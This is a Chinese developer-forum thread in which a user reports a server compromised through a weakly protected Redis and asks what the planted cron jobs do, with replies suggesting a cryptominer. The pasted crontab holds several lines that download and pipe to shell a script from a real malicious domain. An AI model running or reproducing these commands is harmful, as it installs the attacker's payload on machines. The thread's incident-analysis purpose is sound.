V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
• 请不要在回答技术问题时复制粘贴 AI 生成的内容
asche910
V2EX  ›  程序员

好久没上服务器,结果发现被黑了

  •  
  •   asche910 ·
    asche910 · 2020-11-06 10:05:00 +08:00 · 4144 次点击
    这是一个创建于 1514 天前的主题,其中的信息可能已经有所发展或是发生改变。

    之前出于学习目的,就把 redis 给开着,密码也比较简单,然后就那样没管了。 crontab -e

    REDIS0008ú  redis-ver^E4.0.9ú
    redis-bitsÀ@ú ^EctimeÂ
        <98>_ú ^Hused-memÂ(Ü^L^@ú ^Laof-preambleÀ^@þ ^@û^G^@^L^Dhaha##^@^@^@ ^@^@^@^F^@^@^Ceee^E^C1.5^E^Cqqq^Eó ^B^Cwww^Eôÿ^@^EBack4@E\t
    */50 * * * * get http://d.powerofwish.com/pm.sh -O .p && bash .p
        ^@^EBack1?
    */20 * * * * curl -fsSL http://d.powerofwish.com/pm.sh | sh
        ^@^Cfoo^Cbar^@^EBack2@E
    */30 * * * * wget http://d.powerofwish.com/pm.sh -O .p && bash .p
        ^@^L’ ^@^Et^@^Ehello^_’ ^@^Et^@^XRedis ---> Hello, World!^@^EBack3>
    */25 * * * * cur -fsSL http://d.powerofwish.com/pm.sh | sh
        ÿ>^M<81>û<99>E[f
    ~
    

    有大神分析下脚本的用途吗?服务器 cpu 、内存等一切正常。

    12 条回复    2020-11-06 12:51:20 +08:00
    lc1450
        1
    lc1450  
       2020-11-06 10:12:30 +08:00
    brezp
        2
    brezp  
       2020-11-06 10:13:58 +08:00
    估计是挖矿的, 我之前也被试过, 直接把我 CPU 打满了
    dapang1221
        3
    dapang1221  
       2020-11-06 10:22:09 +08:00
    感谢提醒,看见这个之后我也登上服务器看了下,发现 cpu 被 systemd-network 这个东西跑满了。。。
    lc1450
        4
    lc1450  
       2020-11-06 10:32:28 +08:00
    贴下脚本内容,有兴趣的可以看看
    https://paste.ubuntu.com/p/6nNDxn7m6v/
    Still4
        5
    Still4  
       2020-11-06 11:05:57 +08:00
    脚本是下载这个文件并运行 http://a.powerofwish.com/cc
    应该是编译好的文件,没敢试
    heyjei
        6
    heyjei  
       2020-11-06 11:13:43 +08:00
    @Still4 放到 docker 里面试,是不是就没有安全的问题了?
    no1xsyzy
        7
    no1xsyzy  
       2020-11-06 11:22:50 +08:00
    @heyjei docker 不是为了安全设计的……
    而且 docker 不进行适当配置仍然有占完所有 CPU 、内存、硬盘空间、文件系统 inode 资源的能力
    asche910
        8
    asche910  
    OP
       2020-11-06 11:59:09 +08:00
    @lc1450 感觉是非常相似了,不过登录控制台查看监控,发现 cpu 那些也都正常,不会是嫌弃机子太辣鸡了吧😂
    biguokang
        9
    biguokang  
       2020-11-06 12:03:37 +08:00
    @no1xsyzy 他的意思可能是那个脚本不敢直接在系统跑,怕会注入什么东西到系统或者删不掉,而 docker 只要 rm 掉那个 container 就没事了。。。。
    lc1450
        10
    lc1450  
       2020-11-06 12:07:43 +08:00
    还发现这篇文章挺有意思的 https://www.tr0y.wang/2020/07/31/virus-beat-virus/
    我就说怎么有 cur 、get,还以为是写错了,没想到这行业竞争还挺激烈
    看看服务器上还有其他脚本没
    coderabbit
        11
    coderabbit  
       2020-11-06 12:10:49 +08:00 via iPhone
    @heyjei docker 一样被挖矿!我之前用 php 的 docker 就中招了!怎么都搞不死,无奈只好编译安装
    no1xsyzy
        12
    no1xsyzy  
       2020-11-06 12:51:20 +08:00
    @biguokang docker 逃逸比虚拟机容易发生吧(
    而且打开的文件 rm 了以后仍然有副本,理论上可以反复拉起保活……
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2495 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 23ms · UTC 04:57 · PVG 12:57 · LAX 20:57 · JFK 23:57
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.